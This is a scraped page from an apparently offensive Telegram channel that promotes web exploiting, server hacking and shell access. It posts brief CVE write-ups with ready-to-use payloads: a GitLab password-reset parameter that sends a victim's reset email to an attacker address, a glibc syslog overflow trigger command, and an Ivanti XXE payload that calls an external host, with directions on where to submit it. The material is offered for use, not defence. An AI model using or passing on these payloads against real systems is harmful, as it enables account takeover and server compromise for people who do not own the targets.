0Day.Today | Learn Exploit | Zero World | Dark web |
14.7K subscribers
1.1K photos
69 videos
455 files
1.06K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions

Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com

#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations

POC

Read

#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-0193 - Kernel Root Bypass

Github

#CVE #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC auto collect from GitHub

⚠️ Be careful Malware ⚠️

😎 From 1999 to 2024

😸 Github

#CVE #POC #Github #Repo

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2023-6246 - Heap-based buffer overflow in the glibc's syslog

POC :

(exec -a "printf '%0128000x' 1" /usr/bin/su < /dev/null)

#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-22024 - XXE on Ivanti Connect Secure

payload encoded base64:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army